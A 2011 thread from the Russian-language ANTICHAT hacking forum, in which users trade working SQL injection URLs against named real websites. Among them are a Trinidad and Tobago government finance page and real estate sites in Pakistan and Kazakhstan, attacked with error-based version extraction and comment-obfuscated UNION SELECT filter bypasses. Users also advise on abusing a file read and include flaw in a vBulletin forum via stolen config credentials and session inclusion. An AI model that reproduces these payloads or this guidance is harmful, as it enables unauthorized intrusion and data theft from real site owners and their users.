HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #18891  
Старый 17.12.2011, 18:07
er9j6@
Guest
Сообщений: n/a
Провел на форуме:
107835

Репутация: 23
По умолчанию

Цитата:
Сообщение от shadowrun  
shadowrun said:
www.finance.gov.tt/publications.php?mid=192+or+1+group+by+concat(vers ion(),floor(rand(0)*2))having+min(0)+--+
Ministry of Finance, Republic of Trinidad and Tobago не хочет крититься...
Все крутится

Цитата:
Сообщение от None  
http://www.finance.gov.tt/publications.php?mid=192+and+(select+1+from+(selec t+count(0),concat((select+version()),floor(rand(0) *2))+from+(select+1+union+select+2+union+select+3) x+group+by+2+limit+1)a)
 
Ответить с цитированием

  #18892  
Старый 17.12.2011, 20:31
lightangel
Guest
Сообщений: n/a
Провел на форуме:
35174

Репутация: -6
По умолчанию

Why does vulnerable number not showing?

Код:
Code:
http://safariestate.com.pk/details.php?id=-964 /*!uNiOn*/ /*!all*/ /*!SeleCt*/ 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17--
 
Ответить с цитированием

  #18893  
Старый 17.12.2011, 20:34
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094

Репутация: 672


Отправить сообщение для Konqi с помощью ICQ
По умолчанию

Цитата:
Сообщение от lightangel  
lightangel said:
Why does vulnerable number not showing?
Код:
Code:
http://safariestate.com.pk/details.php?id=-964 /*!uNiOn*/ /*!all*/ /*!SeleCt*/ 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17--
http://safariestate.com.pk/details.php?id=964+and+false+/*!union*//**//*!select*//**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17--+
 
Ответить с цитированием

  #18894  
Старый 17.12.2011, 23:11
infoseller
Guest
Сообщений: n/a
Провел на форуме:
49472

Репутация: 0
По умолчанию

Код:
Code:
http://rentinfo.kz/realestate?option=com_ezrealty&controller=properties&task=results&Itemid=55&type=0&cnid=0&stid=0&maxbed=&sold=0&featured=0&custom4=&custom5=&custom6=&custom7=&custom8=&pets=0&lug=&direction=DESCPRICE&min_squarefeet=&max_squarefeet=&postcode=&radius=&keyword=%27%2F*&cid=0&locid=0&minprice=&maxprice=&minbed=&bathrooms=&parking=&submit=%D0%9F%D0%BE%D0%B8%D1%81%D0%BA
Можно ли раскрутить? и как?
 
Ответить с цитированием

  #18895  
Старый 18.12.2011, 02:05
wkar
Познающий
Регистрация: 18.10.2009
Сообщений: 80
Провел на форуме:
1180165

Репутация: 11
По умолчанию

Привет,

есть ли возможность узнать имя фотографии или атача на форуме vbulletin 3.8.4?

Что интересного можно узнать, если есть возможность читать файлы. конфиг смотрел, бд локальная, пма немогу найти.

ПС

Дайте ссылку на пхпмайадмина хостинга infobox.ru
 
Ответить с цитированием

  #18896  
Старый 18.12.2011, 02:10
Expl0ited
Guest
Сообщений: n/a
Провел на форуме:
262707

Репутация: 935
По умолчанию

Цитата:
Сообщение от wkar  
wkar said:
Привет,
есть ли возможность узнать имя фотографии или атача на форуме vbulletin 3.8.4?
Что интересного можно узнать, если есть возможность читать файлы. конфиг смотрел, бд локальная, пма немогу найти.
ПС
Дайте ссылку на пхпмайадмина хостинга infobox.ru
скорее всего в твоем случае vbulletin хранит фотографии в базе а не в фс.

как вариант можешь попробовать подключится с теми данными что ты прочитал в конфиге к 3306 порту (дефолтный порт mysql)
 
Ответить с цитированием

  #18897  
Старый 18.12.2011, 02:19
M_script
Новичок
Регистрация: 04.11.2004
Сообщений: 5
Провел на форуме:
4512

Репутация: 0
По умолчанию

wkar, тебе надо имя загруженного файла на сервере или имя файла, которое у него было на локальном компе во время загрузки на сервер?

У тебя на компе картинка с аватара лежит(ала) в файле o4ad.gif
 
Ответить с цитированием

  #18898  
Старый 18.12.2011, 02:21
wkar
Познающий
Регистрация: 18.10.2009
Сообщений: 80
Провел на форуме:
1180165

Репутация: 11
По умолчанию

Цитата:
Сообщение от None  
как вариант можешь попробовать подключится с теми данными что ты прочитал в конфиге к 3306 порту (дефолтный порт mysql)
Пробовал, не подключается, 61 ошибка.

ПС

хмм, я что-то забыл что можно инклюдить сессии%) Сейчас попробую

2M_script, название файла не сервере, чтоб в дальнейшем его инклюдить.
 
Ответить с цитированием

  #18899  
Старый 18.12.2011, 02:24
Expl0ited
Guest
Сообщений: n/a
Провел на форуме:
262707

Репутация: 935
По умолчанию

Цитата:
Сообщение от wkar  
wkar said:
хмм, я что-то забыл что можно инклюдить сессии%) Сейчас попробую
Так у тебя читалка или инклуд?
 
Ответить с цитированием

  #18900  
Старый 18.12.2011, 02:26
wkar
Познающий
Регистрация: 18.10.2009
Сообщений: 80
Провел на форуме:
1180165

Репутация: 11
По умолчанию

Цитата:
Сообщение от Expl0ited  
Expl0ited said:
Так у тебя читалка или инклуд?
в одно скрипте читалка, в другом инклуд.
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ